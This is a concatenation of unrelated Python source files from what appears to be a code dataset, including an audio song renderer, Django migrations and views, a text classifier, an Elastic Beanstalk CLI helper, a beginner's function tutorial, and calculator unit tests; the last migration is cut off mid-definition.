    attenuate proportionally, positive values amplify towards the maximum
    headroom allowed by the int16 range.  Returns the scaled int16 array,
    or None (after printing a message) for an out-of-range procent.
    """
    if not (-1 <= procent <= 1):
        print("Podaj procent z zakresu -1 do 1")
        return None
    if procent < 0:
        # attenuate: scale linearly down towards silence
        skala = 1 + procent
    else:
        # amplify: the loudest sample bounds how far we may scale up
        szczyt = max(abs(utwor))
        maksymalna_skala = 32767 / szczyt
        # interpolate between no change (1) and the maximum scale
        skala = 1 + (maksymalna_skala - 1) * procent
    return (skala * utwor).astype(np.int16)
#wierszyk1 = zmiana_glosnosci(wierszyk, b['loud'])
#wierszyk1
def tworzenie_piosenki(macierz_piosenki, czy_pelna = True, bpm = 120, \
                       freq = 44100, wages = None, loud = 0):
    """
    Main function that renders the whole song.

    Args:
        macierz_piosenki (numpy.ndarray, str 'U2'): matrix describing each
            quarter note (which sample plays in each channel; '--' = rest).
        czy_pelna (bool): whether macierz_piosenki was built successfully
            (False when the tracks had the wrong number of rows/columns).
        bpm (int): song tempo in beats per minute.
        freq (int): sample rate of the output wav (samples per second).
        wages (list of float): per-channel mixing weights (how much sample 1,
            sample 2, ... contribute), or None for equal weights.
        loud (float): loudness in [-1, 1]; 0 keeps the original volume,
            1 amplifies to the maximum, -1 silences the track.

    Returns:
        numpy.ndarray (numpy.int16): the rendered song, or None when
        czy_pelna is False.

    NOTE(review): reads ``sampleXY.wav`` files from the current working
    directory and assumes they are stereo (np.mean over axis=1) -- confirm.
    """
    # the song matrix was empty/invalid, no song is created
    if(czy_pelna == False):
        print("Nie utworzono piosenki")
        return None
    else:
        import numpy as np
        import scipy.io.wavfile
        t_cwiercnuty = 60 / bpm # duration of one quarter note (depends on
        # the tempo)
        ile_cwiercnut = macierz_piosenki.shape[0] # number of quarter notes
        kanaly = macierz_piosenki.shape[1] # number of sample channels used
        frekw = freq
        czas_utworu = ile_cwiercnut*t_cwiercnuty
        # how many samples the new track will contain
        ilosc_probek = int(frekw*czas_utworu)
        # each sampleXY.wav is loaded only once, so collect the unique
        # sample identifiers first
        rozne_sample = np.unique(macierz_piosenki) # includes "--" (rest)
        # dictionaries caching the parameters of those samples:
        # amplitude arrays (numpy matrices) per sample id
        sample_co = {}
        sample_frekw = {} # their sample rates
        sample_dl = {} # their lengths
        # load the samples; the loop iterates over the *strings*
        # "01", "02", "--" etc.
        for ktory_sampel in rozne_sample:
            if(ktory_sampel != '--'):
                # build the sample file name, e.g. "sample01.wav"
                plik = ''.join(['sample',ktory_sampel,'.wav'])
                # read the sample's contents and sample rate into the
                # corresponding entries of sample_co and sample_frekw
                sample_frekw[ktory_sampel], sample_co[ktory_sampel] = \
                scipy.io.wavfile.read(plik)
                # downmix the sample to mono
                sample_co[ktory_sampel] = np.mean(sample_co[ktory_sampel],\
                                                  axis=1)/32767
                # normalize the values back to the full int16 range
                sample_co[ktory_sampel] = np.int16(sample_co[ktory_sampel]/ \
                         max(np.abs(sample_co[ktory_sampel])) * 32767)
                # remember the sample length in frames
                # ( = duration * sample rate)
                sample_dl[ktory_sampel] = sample_co[ktory_sampel].shape[0]
            else: # "--" is a rest, set its parameters by hand
                # silence for "--"
                sample_co[ktory_sampel] = np.zeros((1,), dtype=np.int16)
                sample_frekw[ktory_sampel] = frekw # same as the default rate
                sample_dl[ktory_sampel] = 0 # assume 0 seconds
        if wages is None:
            wages = np.ones((1,kanaly))
        else:
            # reshape so the weights have shape (1, kanaly), not (kanaly,)
            wages = np.array(wages).reshape(1,kanaly)
        # output buffer for the new track
        # NOTE(review): T starts as a linspace time axis and is then reused
        # as the sample buffer -- the initial values are overwritten/added
        # to; confirm this is intended.
        T = np.linspace(0, czas_utworu, ilosc_probek)
        for wiersz in range(0, ile_cwiercnut):
            sample = [] # the samples used in this quarter note
            dlugosci = [] # and their lengths
            for i in range(0, kanaly):
                sampus = macierz_piosenki[wiersz,i]
                sample.append(sample_co[sampus])
                dlugosci.append(sample_dl[sampus])
            # the longest sample is played in full; the shorter ones are
            # padded with silence (zeros) once they end
            maksik = max(dlugosci)
            # matrix of shape (channels, max length), ready for mixing
            # the sounds into one
            pusty = np.int16(np.zeros((len(sample), maksik)))
            # copy each channel's sound into the padded matrix
            for k in range(0, kanaly):
                pusty[k][0:dlugosci[k]] = sample[k]
            # multiply each channel by its weight and sum (mixdown)
            cwiercnuta = np.dot(wages, pusty)
            # np.dot returns shape (1, x); we want (x,), so take row 0
            cwiercnuta = cwiercnuta[0]
            # start frame of the current quarter note
            poczatek_cwiercnuty = int(wiersz*t_cwiercnuty*frekw)
            # if the final quarter notes would run past the end of the
            # track, truncate them to fit
            if (poczatek_cwiercnuty + maksik) > ilosc_probek:
                T[poczatek_cwiercnuty:(poczatek_cwiercnuty + maksik)]=\
                cwiercnuta[0:len(T[poczatek_cwiercnuty:(poczatek_cwiercnuty +\
                maksik)])]
            else:
                T[poczatek_cwiercnuty:(poczatek_cwiercnuty + maksik)] += \
                cwiercnuta
        T= np.array(T, dtype=np.int16)
        # apply the requested loudness
        T = zmiana_glosnosci(T, loud)
        return T
#pios, k = wczytywanie_sciezek(a)
#wierszyk = tworzenie_piosenki(pios, k, bpm = b['bpm'], freq = b['freq'], \
#wages = b['wages'])
#wierszyk = tworzenie_piosenki(pios, k, **b)
#wierszyk |
6,370 | 52a4213a1729e25f96faebc5fd4f299017446c5a | # Generated by Django 3.0.10 on 2020-12-19 15:07
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: registers the unmanaged ``Admin`` model, whose only
    purpose is to carry the ``access_admin`` permission for the Wagtail
    admin (no database table is created: ``managed`` is False)."""

    initial = True

    dependencies = [
        ("wagtailadmin", "0001_create_admin_access_permissions"),
    ]

    operations = [
        migrations.CreateModel(
            name="Admin",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
            ],
            options={
                "permissions": [("access_admin", "Can access Wagtail admin")],
                "managed": False,
                "default_permissions": [],
            },
        ),
    ]
|
6,371 | f82c961fc1accd362b34a685bac4cc35d98f44ef | import pandas as pd
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.svm import LinearSVC
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
if __name__ == "__main__":
    # Baseline text classifier: TF-IDF features (uni- to tri-grams)
    # feeding a linear SVM, evaluated on a held-out 20% split.
    # Expects ./dataset.csv with "text" and "label" columns.
    dataset = pd.read_csv('./dataset.csv')
    X_train, X_test, y_train, y_test = train_test_split(
        dataset["text"], dataset["label"], test_size=0.2, random_state=1, shuffle=True
    )
    baseline_pipeline = Pipeline(
        [("vect", TfidfVectorizer(ngram_range=(1, 3))), ("svc", LinearSVC())]
    )
    baseline_pipeline.fit(X_train, y_train)
    # 4-digit precision/recall/F1 per class on the test split
    print(classification_report(y_test, baseline_pipeline.predict(X_test), digits=4))
6,372 | c9191df0fc04818b4df9c93a9479f75a60688aa9 | from django.shortcuts import render, HttpResponseRedirect, HttpResponse
from django.views.generic import View
from django.contrib.auth import login
from django.contrib.auth.models import User
class RegisterView(View):
    """Sign-up view: GET renders the registration form, POST creates a
    Django ``User`` (username is set to the submitted email address)."""

    def get(self, request):
        return render(request, 'users/register.html', locals())

    def post(self, request):
        try:
            user = User(first_name=request.POST.get('first_name'), last_name=request.POST.get(
                'last_name'), email=request.POST.get('email'), username=request.POST.get('email'))
            # hash the password instead of storing it in plain text
            user.set_password(request.POST.get('password'))
            user.save()
        except Exception as e:
            # NOTE(review): broad catch -- any failure (e.g. duplicate
            # username) just re-renders the form; the error is only printed
            # to stdout and never shown to the user. Consider logging.
            print(e)
            return render(request, 'users/register.html', locals())
        return HttpResponseRedirect('/users/login')
class HomeView(View):
    """Render a plain-text home page identifying the signed-in user."""

    def get(self, request):
        greeting = f"Home Page | Logged in as - {request.user}"
        return HttpResponse(greeting)
|
6,373 | 653c8db6741a586694d91bd9928d8326cce9e41d | # Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from cement.utils.misc import minimal_logger
try:
import configparser
except ImportError:
import ConfigParser as configparser
from ..core import io, fileoperations
from ..operations import commonops
from ..lib import utils, elasticbeanstalk
from ..objects.exceptions import NotInitializedError, InvalidSyntaxError, \
NotFoundError
LOG = minimal_logger(__name__)

# sentinel distinguishing "no default supplied" from an explicit None default
_marker = object()
# caches the application name chosen by get_application_name() for later use
_selected_app = None
def get_application_name(default=_marker, prompt=True):
    """Return the EB application name for the current directory.

    Reads it from the local config; if the directory is not initialized and
    ``prompt`` is True, asks the user interactively. Otherwise falls back to
    ``default``, or raises NotInitializedError when no default was given.
    Side effect: caches the chosen name in the module-global ``_selected_app``.
    """
    global _selected_app
    result = None
    try:
        result = fileoperations.get_config_setting('global', 'application_name')
    except NotInitializedError:
        if prompt:
            result = _get_application_name_interactive()
    if result is not None:
        _selected_app = result
        return result
    # get_config_setting should throw error if directory is not set up
    LOG.debug('Directory found, but no config or app name exists')
    if default is _marker:
        raise NotInitializedError
    _selected_app = default
    return default
def _get_application_name_interactive():
    """Prompt the user to pick one of the existing EB applications.

    The list entry matching the current directory name is pre-selected;
    otherwise the last entry is the default.

    NOTE(review): ``new_app`` is assigned but never used, and when
    ``app_list`` is empty ``app_name`` is never bound -- the final return
    would raise NameError. Looks like a trimmed-down "create new app" path;
    confirm against the full implementation.
    """
    app_list = commonops.get_application_names()
    file_name = fileoperations.get_current_directory_name()
    new_app = False
    if len(app_list) > 0:
        io.echo()
        io.echo('Select an application to use')
        try:
            # default to the app named like the current directory (1-based)
            default_option = app_list.index(file_name) + 1
        except ValueError:
            default_option = len(app_list)
        app_name = utils.prompt_for_item_in_list(app_list, default=default_option)
    return app_name
def get_environment_name():
    """Prompt the user to pick an environment of the previously selected
    application (``_selected_app``) and return its name."""
    environments = [env.name for env in elasticbeanstalk.get_app_environments(_selected_app)]
    io.echo()
    io.echo('Select an environment to use')
    return utils.prompt_for_item_in_list(environments)
|
6,374 | 8a6eb2eb746e3b9de92998b70ddff2a39cb1f269 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/4/11 16:07
# @Author : LiuZhi
# @Site :
# @File : Function.py
# @Software: PyCharm
# abs(): absolute value
print(abs(100))
print(abs(-20))
print(abs(12.34))
#print(abs(1,2))
#print(abs('q'))
print(max(1,2))
print(max(1,2,3,-5))
# type-conversion built-ins
print(int('123'))
print(int(12.34))
print(float('12.34'))
print(str(1.23))
print(str(100))
print(bool(1))
print(bool(''))
# functions are objects: bind abs to another name and call it
a = abs
print(a(-1))
n1 = 255
n2 = 1000
print(hex(255))
print(hex(1000))
from abstest import my_abs
print(my_abs(-2))
#print(my_abs(-2,3))
#print(my_abs('222'))
# the triple-quoted string below demonstrates the ``pass`` placeholder
'''
pass用法
def nop():
    pass
age = 26
if age >= 18:
    pass
'''
import math
def move(x,y, step, angle = 0):
    """Move (x, y) by ``step`` along direction ``angle`` (radians);
    note y decreases for positive sin (screen-style coordinates)."""
    nx = x + step * math.cos(angle)
    ny = y - step * math.sin(angle)
    return nx,ny
# multiple return values are really a tuple: unpack or keep as one
x, y = move(100, 100, 60, math.pi/6)
print(x,y)
r = move(100, 100, 60, math.pi/6)
print(r)
# solve a quadratic equation
def quadratic(a, b, c):
    """Solve a*x^2 + b*x + c = 0.

    Returns:
        tuple (x1, x2) with the (possibly equal) real roots, or a Chinese
        message string for the degenerate cases: "all reals" when
        a == b == c == 0, "no roots" when the equation is unsolvable or
        the discriminant is negative.

    Raises:
        TypeError: if any coefficient is not an int/float.
    """
    if not isinstance(a, (int, float)):
        raise TypeError('a is not a number')
    if not isinstance(b, (int, float)):
        # fix: the message wrongly said 'a is not a number'
        raise TypeError('b is not a number')
    if not isinstance(c, (int, float)):
        # fix: the message wrongly said 'a is not a number'
        raise TypeError('c is not a number')
    d = b*b - 4*a*c  # discriminant
    if a == 0:
        # degenerate: linear (or constant) equation
        if b == 0:
            if c == 0:
                return '方程根为全体实数'
            else:
                return '方程无根'
        else:
            x1 = -c/b
            x2 = x1
            return x1, x2
    else:
        if d<0:
            return '方程无根'
        else:
            x1 = (-b + math.sqrt(d))/2/a
            x2 = (-b - math.sqrt(d))/2/a
            return x1,x2
print(quadratic(2, 3, 1))
print(quadratic(0,0,0))
def power(x):
    """Return x squared."""
    return x*x
print(power(4))
print(power(-2))
# default parameters
def powerThree(x, n=2):
    """Return x**n computed by repeated multiplication (n defaults to 2)."""
    s = 1
    while n >0 :
        n = n - 1
        s = s * x
    return s
print(powerThree(5,3))
print(powerThree(5))
def enroll(name, gender, age = 6, city = 'Beijing'):
    """Print enrollment info; age and city have defaults."""
    print('name:', name)
    print('gender', gender)
    print('age', age)
    print('city', city)
print(enroll('Sarah', 'F'))
def add_end(l=None):
    """Append 'END' to l; uses the None-sentinel idiom so the default list
    is NOT shared between calls (each call gets a fresh one)."""
    if l is None:
        l = []
    l.append('END')
    return l
print(add_end([1, 2, 3]))
# three calls, each returns a fresh ['END'] thanks to the None default
print(add_end())
print(add_end())
print(add_end())
# variable-length (star) arguments
def calc(numbers):
    """Return the sum of squares of an iterable of numbers."""
    sum = 0
    for n in numbers:
        sum = sum + n * n
    return sum
print(calc([1, 2, 3]))
print(calc((1, 2, 3)))
def calcTwo(*numbers):
    """Same as calc(), but takes the numbers as positional *args."""
    sum = 0
    for n in numbers:
        sum = sum + n * n
    return sum
print(calcTwo(1,2))
print(calcTwo())
numbers = [1, 2, 3]
print(calcTwo(numbers[0], numbers[1], numbers[2]))
# the * operator unpacks a list/tuple into positional arguments
print(calcTwo(*numbers))
# keyword arguments
def person(name, age, **kw):
    """Demo of **kw collecting arbitrary keyword arguments into a dict."""
    print('name:', name, 'age:', age, 'other:', kw)
person('michael', 30)
person('michael', 30, city='Beijing')
person('michael', 30, gender='m', job='engineer')
extra = {'city':'Beijing', 'job': 'engineer'}
person('Jack', 24, city = extra['city'], job = extra['job'])
# the ** operator unpacks a dict into keyword arguments
person('Jack', 24, **extra)
# redefinition: same demo, but inspecting kw for specific keys
def person(name, age, **kw):
    if 'city' in kw:
        pass
    if 'job' in kw:
        pass
    print('name:', name, 'age:', age, 'other:', kw)
person('jack', 24, city='beijing', addr = 'chaoyang', zipcode=123456)
# the bare * makes city and job keyword-only parameters
def personTwo(name, age, *, city, job):
    print(name, age, city, job)
personTwo('jack', 24, city='beijing', job='engineer')
# *args before keyword-only parameters
def personThree(name, age, *args, city, job):
    print(name, age, args, city, job)
#personThree('jack', 24, 'beijing', 'engineer')
# keyword-only parameter with a default
def personFour(name, age, *, city='beijing', job):
    print(name, age, city, job)
personFour('jack', 24, job = 'engineer')
def personFive(name, age, city, job):
    pass
# combining positional, default, *args and **kw parameters
def f1(a, b, c=0, *args, **kw):
    print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)
def f2(a, b, c=0, *, d, **kw):
    print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)
f1(1, 2)
f1(1, 2, 3)
f1(1, 2, 3, 'a', 'b')
f1(1, 2, 3, 'a', 'b', x=99)
f2(1, 2, d=99, ext=None)
# any function can be called with a tuple + dict via * and **
args = (1,2, 3, 4)
kw = {'d':99,'x':'#'}
f1(*args, **kw)
args = (1,2, 3)
kw = {'d':88, 'x':'#'}
f2(*args, **kw)
|
6,375 | 318556a6c327294986fcef938c254b8dfe66adaa | class Car:
__name=""
__maxspeed = 0
def __init__(self):
self.__updateSoftware()
self.__name = "Supercar"
self.__maxspeed=320
def drive(self):
print("Driving")
print("name of the car " + self.__name)
def __updateSoftware(self):
print("Updating Software")
def sayHello(self,name=None):
if name is None:
print ("Hello")
else:
print("Hello" + name)
redcar = Car()
redcar.sayHello()
redcar.sayHello("Venky")
redcar.drive()
# name mangling: the "private" attribute is reachable as _Car__maxspeed
print(redcar._Car__maxspeed)
#redcar._Car__updateSoftware()
|
6,376 | f17d59ca9bfa82848ec6a599e98f759449ccdd14 | """
test_extra.py:
In this file i wrote extra tests to my calculator program.
Divided to some main parts:
- Math Errors Tests (divide in zero, factorial, complex numbers)
- Test with edge cases of minus (operator / sign)
- Big results tests: expression that their result
will be inf or cause overflow exception
- test spaces in expressions
- test to the tokens_validation.py functions:
valid brackets, unnecessary parentheses, last token validation
- Decimal point place in expressions
- pre and post unary operations
"""
from calculator_main_omega import *
from errors import *
# Math Errors Tests
def test_divide_in_zero_from_start():
    # division by a literal zero, detectable before solving
    expression = '56/0'
    result = main_evaluate(expression)
    assert result.error_type == DIVIDE_ZERO
def test_divide_in_zero_while_solve():
    # division by zero that only appears during evaluation
    expression = '56/(5-5)'
    result = main_evaluate(expression)
    assert result.error_type == DIVIDE_ZERO
def test_mod_in_zero():
    expression = '-3%0'
    result = main_evaluate(expression)
    # modulo by zero must be reported as a divide-by-zero error
    assert result.error_type == DIVIDE_ZERO
def test_complex_number():
    expression = '(-7)^0.5'
    result = main_evaluate(expression)
    # a complex result must be reported as COMPLEX_ERROR
    assert result.error_type == COMPLEX_ERROR
def test_factorial_negative():
    expression = '(-9)!'
    result = main_evaluate(expression)
    # factorial of a negative number is not legal
    assert result.error_type == FACTORIAL_ERROR
def test_factorial_not_round():
    expression = '2.404!+34'
    result = main_evaluate(expression)
    # factorial of a fractional number is not legal
    assert result.error_type == FACTORIAL_ERROR
def test_factorial_huge_number():
    expression = '600000!+4'
    result = main_evaluate(expression)
    assert result.error_type == MEMORY_EXCEPTION
# Minus tests:
def test_minus_start():
    # expression with '-' as the very first character
    expression = '-2^3'
    result = main_evaluate(expression)
    assert result == -8
def test_minus_after_binary():
    # unary minus directly after a binary operator
    expression = '5*-2'
    result = main_evaluate(expression)
    assert result == -10
def test_minuses_row():
    # several consecutive minuses (sign minuses stack)
    expression = '---(4+2)+8----8'
    result = main_evaluate(expression)
    assert result == 10
def test_huge_equation():
    expression = ('1+' * 10000) + '0'
    # an expression with 10000 operators: checks the program
    # copes with very long (but valid) input
    result = main_evaluate(expression)
    assert result == 10000
def test_max_size_expression():
    # an expression one character longer than
    # MAX_EXPRESSION_SIZE must be rejected
    expression = '5' * (MAX_EXPRESSION_SIZE + 1)
    result = main_evaluate(expression)
    assert result.error_type == MEMORY_EXCEPTION
# Big results tests:
def test_pow_overflow():
    expression = '225^225.6'
    result = main_evaluate(expression)
    assert result.error_type == MEMORY_EXCEPTION
def test_multiply_overflow():
    expression = '170!*444444'
    result = main_evaluate(expression)
    # the result of this expression is too big to store in a float
    assert result.error_type == MEMORY_EXCEPTION
def test_minus_inf_number():
    """A huge negative literal that overflows float (-inf) must be reported
    as MEMORY_EXCEPTION.

    fix: the original had a stray trailing backslash after the last string
    fragment, which glued the literal onto the following ``result = ...``
    line and made the whole module a SyntaxError.
    """
    expression = '-67675765675675675675897333333333' \
                 '09876767565656756745345543333335' \
                 '67567563453423423423436546333337' \
                 '47646767567576575675756756733335' \
                 '76578867864564534535423423413533' \
                 '32523523525235235235235352352433' \
                 '12412413523523535235241241241231' \
                 '24124421874126512561275126571323' \
                 '52352353523524124124121241244218' \
                 '52352353523524124124121241244218' \
                 '52352353523524124124121241244218' \
                 '52352353523524124124121241244218'
    result = main_evaluate(expression)
    # python stores this as float('-inf'); the program must handle it
    assert result.error_type == MEMORY_EXCEPTION
def test_plus_inf_number():
    """A huge positive literal that overflows float (+inf) must be reported
    as MEMORY_EXCEPTION.

    fix: removed the stray trailing backslash after the last string
    fragment (it merged the literal with the next statement -> SyntaxError).
    """
    expression = '67675765675675675675897333333333' \
                 '09876767565656756745345543333335' \
                 '67567563453423423423436546333337' \
                 '47646767567576575675756756733335' \
                 '76578867864564534535423423413533' \
                 '32523523525235235235235352352433' \
                 '12412413523523535235241241241231' \
                 '24124421874126512561275126571323' \
                 '52352353523524124124121241244218' \
                 '52352353523524124124121241244218' \
                 '52352353523524124124121241244218' \
                 '52352353523524124124121241244218'
    result = main_evaluate(expression)
    # python stores this as float('inf'); the program must handle it
    assert result.error_type == MEMORY_EXCEPTION
# Space Test:
def test_space_inside_number():
    # an illegal space splits the number '47' in two; like the real
    # Python interpreter, a space inside a number is invalid syntax
    expression = '5*1^4+4 7+5'
    result = main_evaluate(expression)
    assert result.error_type == SPACE_IN_NUMBER
# Expression validations tests:
# Tests for the validations performed on the expression
# before the token list is built
def test_illegal_char_validation():
    expr = '454#f'
    validate = math_validations(expr)
    assert validate.error_type == ILLEGAL_CHAR
def test_unnecessary_brackets_validation():
    expr = '3^((4+4))'
    validate = math_validations(expr)
    # double brackets around a simple expression like 4+4 are not legal;
    # the calculator must recognize this before solving
    assert validate.error_type == UNNECESSARY_PARENTHESES
def test_only_number_in_brackets():
    expr = '(6)'
    validate = math_validations(expr)
    # a single number in brackets is allowed
    assert validate is True
def test_opener_has_no_closer():
    expr = '((65+6)/6+(4+8/3'
    validate = math_validations(expr)
    # one of the '(' openers has no matching ')'
    assert validate.error_type == BRACKETS_ERROR
def test_closer_has_no_opener():
    expr = '(4+5)+9)+25^4'
    validate = math_validations(expr)
    # one of the ')' closers has no matching '('
    assert validate.error_type == BRACKETS_ERROR
def test_last_token_pre_unary():
    expr = '4!+~'
    validate = math_validations(expr)
    assert validate.error_type == LAST_TOKEN_ERROR
def test_last_token_binary_operator():
    expr = '4!+'
    validate = math_validations(expr)
    assert validate.error_type == LAST_TOKEN_ERROR
# Tests for the use of the decimal point in expressions
def test_double_dot_validation():
    expr = '4!+7..7'
    validate = math_validations(expr)
    # a dot cannot follow a dot, so the specific error
    # is the "dot after dot" DOT_ERROR
    assert validate.error_type == DOT_ERROR
def test_first_dot_validation():
    expr = '.5+45*(65/7)'
    validate = math_validations(expr)
    # a dot cannot be the first character of the expression
    assert validate.error_type == DOT_ERROR
def test_dot_after_operator_validation():
    expr = '45+.5'
    validate = math_validations(expr)
    # a dot cannot directly follow an operator
    assert validate.error_type == DOT_ERROR
def test_valid_dot():
    expr = '45+0.5'
    result = main_evaluate(expr)
    assert result == 45.5
def test_no_fraction_after_dot():
    expr = '8.*2'
    # a trailing dot with no fraction is supported,
    # matching the real Python interpreter
    result = main_evaluate(expr)
    assert result == 16
# Pre Unary Tests:
def test_tilda_before_minus():
    expr = '~~-(70)'
    result = main_evaluate(expr)
    assert result == -70
def test_pre_unary_in_a_row():
    expr = '~~~2'
    result = main_evaluate(expr)
    assert result == -2
def test_pre_unary_with_minuses():
    expr = '~-~--~-10'
    result = main_evaluate(expr)
    assert result == -10
# Post Unary Tests:
def test_post_unary_in_a_row():
    # chained factorial: (3!)! = 720, plus 4
    expr = '3!!+4'
    result = main_evaluate(expr)
    assert result == 724
def test_post_unary_on_brackets():
    # factorial applied to a bracketed sub-expression
    expr = '(1+5&8$3)!+4'
    result = main_evaluate(expr)
    assert result == 724
|
6,377 | 7ce471b3a6966c1a60ae2e2f3ec42369fe3d0f9c | # Generated by Django 3.2.1 on 2021-05-17 18:02
import django.contrib.auth.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the main app: clients (with extra phone numbers and
    addresses), menus composed of sections and foods, compositions mixing
    foods and extras, orders with order lines, and a ZeUser extending the
    built-in auth User."""

    initial = True

    dependencies = [
        ('auth', '0012_alter_user_first_name_max_length'),
    ]

    operations = [
        migrations.CreateModel(
            name='Client',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(blank=True, max_length=255)),
                ('last_name', models.CharField(blank=True, max_length=255)),
                ('address', models.TextField(max_length=1000, verbose_name='Address')),
                ('phone', models.CharField(max_length=255, unique=True)),
                ('email', models.EmailField(blank=True, max_length=254, null=True)),
            ],
            options={
                'verbose_name': 'Client',
                'verbose_name_plural': 'Clients',
            },
        ),
        migrations.CreateModel(
            name='Composition',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('cost', models.PositiveIntegerField(default=0, verbose_name='Cost')),
            ],
            options={
                'verbose_name': 'Composition',
                'verbose_name_plural': 'Compositions',
            },
        ),
        migrations.CreateModel(
            name='Extra',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255, unique=True, verbose_name='Name')),
                ('type', models.CharField(choices=[('dessert', 'Dessert'), ('drink', 'Drink'), ('other', 'Other')], default='other', max_length=20, verbose_name='Type')),
                ('price', models.PositiveIntegerField(verbose_name='Price')),
                ('discount_price', models.PositiveIntegerField(blank=True, null=True, verbose_name='Discount Price')),
            ],
            options={
                'verbose_name': 'Extra',
                'verbose_name_plural': 'Extras',
                'ordering': ('name', 'type'),
            },
        ),
        migrations.CreateModel(
            name='Menu',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255, unique=True, verbose_name='Name')),
                ('audio_file_name', models.CharField(blank=True, max_length=255, verbose_name='Music')),
                ('available', models.BooleanField(default=True, verbose_name='Available')),
                ('image', models.ImageField(blank=True, null=True, upload_to='images', verbose_name='Image')),
                ('font_name', models.CharField(blank=True, max_length=255, verbose_name='Font')),
                ('price', models.PositiveIntegerField(default=0, verbose_name='Price')),
            ],
            options={
                'verbose_name': 'Menu',
                'verbose_name_plural': 'Menus',
            },
        ),
        migrations.CreateModel(
            name='Order',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('number', models.CharField(max_length=255, unique=True)),
                ('status', models.CharField(choices=[('pending', 'Pending'), ('confirmed', 'Confirmed'), ('preparing', 'Preparing'), ('ready', 'Ready'), ('on_delivery', 'On Delivery'), ('delivered', 'Delivered'), ('canceled', 'Canceled'), ('no_answer', 'No Answer'), ('ditched', 'Ditched')], default='pending', max_length=20)),
                ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='orders', to='mainapp.client', verbose_name='Client')),
            ],
        ),
        # ZeUser uses multi-table inheritance from auth.User (user_ptr link)
        migrations.CreateModel(
            name='ZeUser',
            fields=[
                ('user_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='auth.user')),
                ('phone', models.CharField(max_length=255, unique=True)),
                ('is_admin', models.BooleanField(default=False)),
                ('is_deliveryman', models.BooleanField(default=False)),
            ],
            options={
                'verbose_name': 'User',
                'verbose_name_plural': 'Users',
            },
            bases=('auth.user',),
            managers=[
                ('objects', django.contrib.auth.models.UserManager()),
            ],
        ),
        migrations.CreateModel(
            name='Section',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255, verbose_name='Name')),
                ('position', models.PositiveIntegerField(default=1, verbose_name='Position')),
                ('menu', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.menu', verbose_name='Menu')),
            ],
            options={
                'verbose_name': 'Section',
                'verbose_name_plural': 'Sections',
                'ordering': ('position',),
            },
        ),
        migrations.CreateModel(
            name='PhoneNumber',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('phone', models.CharField(max_length=255, unique=True, verbose_name='Phone Number')),
                ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='phones', to='mainapp.client', verbose_name='Client')),
            ],
            options={
                'verbose_name': 'Phone Number',
                'verbose_name_plural': 'Phone Numbers',
                'ordering': ('id',),
            },
        ),
        migrations.CreateModel(
            name='OrderLine',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('quantity', models.PositiveIntegerField(default=1, verbose_name='Quantity')),
                ('composition', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.composition', verbose_name='Composition')),
                ('order', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='lines', to='mainapp.order', verbose_name='Order')),
            ],
            options={
                'ordering': ('id',),
            },
        ),
        migrations.CreateModel(
            name='Food',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255, verbose_name='Name')),
                ('price', models.PositiveIntegerField(default=0, verbose_name='Price')),
                ('discount_price', models.PositiveIntegerField(blank=True, null=True, verbose_name='Discount Price')),
                ('description', models.TextField(blank=True, max_length=1000)),
                ('image', models.ImageField(blank=True, null=True, upload_to='images', verbose_name='Image')),
                ('section', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.section', verbose_name='Section')),
            ],
            options={
                'verbose_name': 'Food',
                'verbose_name_plural': 'Foods',
                'ordering': ('name', 'section__position'),
            },
        ),
        # through-model for Composition.selected_foods, freezing the food
        # price at the time the composition was made
        migrations.CreateModel(
            name='CompositionFood',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('food_price', models.PositiveIntegerField(default=0, verbose_name='Food Price')),
                ('composition', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.composition', verbose_name='Composition')),
                ('food', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.food', verbose_name='Food')),
            ],
            options={
                'ordering': ('food__section__position',),
            },
        ),
        migrations.AddField(
            model_name='composition',
